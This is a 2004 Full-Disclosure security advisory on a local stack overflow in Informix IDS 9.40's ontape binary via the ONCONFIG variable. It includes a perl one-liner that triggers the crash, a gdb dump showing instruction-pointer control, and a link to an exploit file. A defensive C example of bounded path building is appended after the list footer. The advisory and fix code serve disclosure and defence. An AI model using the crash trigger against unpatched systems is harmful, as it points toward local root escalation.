From pask@open3s.com Thu Jan 29 20:44:52 2004
From: pask@open3s.com
To: "[Full Disclosure]"
Date: Tue, 27 Jan 2004 15:31:51 +0100 (CET)
Subject: [Full-Disclosure] OPEN3S-2003-08-08-eng-informix-ontape

----------========== OPEN3S-2003-08-08-eng-informix-ontape ==========----------

Title:    Local Vulnerability at Informix IDSv9.40 via ontape binary
Date:     08-08-2003
Platform: Only tested on Linux, but can be exported to others.
Impact:   Any user with DSA privileges over Informix could achieve root
          privileges through a stack buffer overflow in the ontape binary.
Author:   Juan Manuel Pascual Escriba pask@open3s.com
Status:   Solved by IBM Corp.

PROBLEM SUMMARY:

A stack buffer overflow exists in the code that reads the ONCONFIG
environment variable when its value is bigger than 495 bytes.

  [informix@dimoni bin]$ export ONCONFIG=`perl -e 'print "A"x495'`
  [informix@dimoni bin]$ ./ontape
  WARNING: Cannot access configuration file $INFORMIXDIR/etc/$ONCONFIG.
  Segmentation fault

  [pask@dimoniet bin]$ gdb ./ontape
  (gdb) r
  WARNING: Cannot access configuration file $INFORMIXDIR/etc/$ONCONFIG.
  Segmentation fault
  (gdb) info reg
  eax            0xffffffff       -1
  ecx            0x40083580       1074279808
  edx            0x46             70
  ebx            0x1              1
  esp            0xbfff74a0       0xbfff74a0
  ebp            0x41414141       0x41414141
  esi            0xbfff74cc       -1073777460
  edi            0x0              0
  eip            0x41414141       0x41414141

It's possible to achieve root privileges through this buffer overflow.

IMPACT:

Any user with exec permission over ontape could achieve root privileges.
In my default installation only users with DSA privileges can exec this
binary.

SOLUTION:

See more information about this vulnerability and workaround at:
http://www-1.ibm.com/support/docview.wss?uid=swg21153336

STATUS:

Reported to the IBM security team on 11th of August 2003.

This vulnerability was managed in an efficient manner by Jonathan Leffler
from the IBM Informix Database Engineering Team.

EXPLOIT:

http://www.open3s.com/exploits/OPEN3S-2003-08-08-eng-informix-ontape.c

--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba pask@open3s.com
Barcelona - Spain
http://www.open3s.com
--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
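As an added illustration (not part of the advisory and not IBM's code) of the defensive pattern that closes this bug class: a setuid tool that builds its configuration-file path from an attacker-controlled environment variable must bound the copy and fail closed instead of trusting the variable's length. The function name, the ONCONFIG_MAX limit and the "/opt/informix" directory below are assumptions; the inputs are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Upper bound on the ONCONFIG value we accept (assumption). The advisory
 * shows a crash at 495 bytes; ontape's real buffer size is not public. */
#define ONCONFIG_MAX 255

/* Vulnerable pattern consistent with the register dump (ebp/eip = 0x41414141),
 * shown for contrast only and never run here:
 *   char path[512];
 *   sprintf(path, "%s/etc/%s", getenv("INFORMIXDIR"), getenv("ONCONFIG"));
 * A longer ONCONFIG runs past path[] into the saved frame pointer and the
 * return address, which is exactly what the gdb output above shows. */

/* Hardened replacement: returns 0 and fills out[] on success, -1 on any
 * rejected input. Over-long values are refused, never silently truncated. */
int build_onconfig_path(const char *informixdir, const char *onconfig,
                        char *out, size_t outlen)
{
    if (informixdir == NULL || onconfig == NULL || out == NULL || outlen == 0)
        return -1;
    size_t n = strlen(onconfig);
    if (n == 0 || n > ONCONFIG_MAX)
        return -1;
    /* ONCONFIG names a file under $INFORMIXDIR/etc: no path components */
    if (strchr(onconfig, '/') != NULL || strstr(onconfig, "..") != NULL)
        return -1;
    int written = snprintf(out, outlen, "%s/etc/%s", informixdir, onconfig);
    if (written < 0 || (size_t)written >= outlen) {
        out[0] = '\0';             /* would not fit: fail closed */
        return -1;
    }
    return 0;
}

/* Feeds an ONCONFIG of `len` 'A' bytes (constructed input mirroring the
 * advisory's perl one-liner) and reports the result code. */
int check_onconfig_len(size_t len)
{
    char name[1024], path[2048];
    if (len >= sizeof name) return -1;
    memset(name, 'A', len);
    name[len] = '\0';
    return build_onconfig_path("/opt/informix", name, path, sizeof path);
}

int main(void)
{
    printf("12 bytes: %d, 495 bytes: %d\n",
           check_onconfig_len(12), check_onconfig_len(495));
    return 0;
}
```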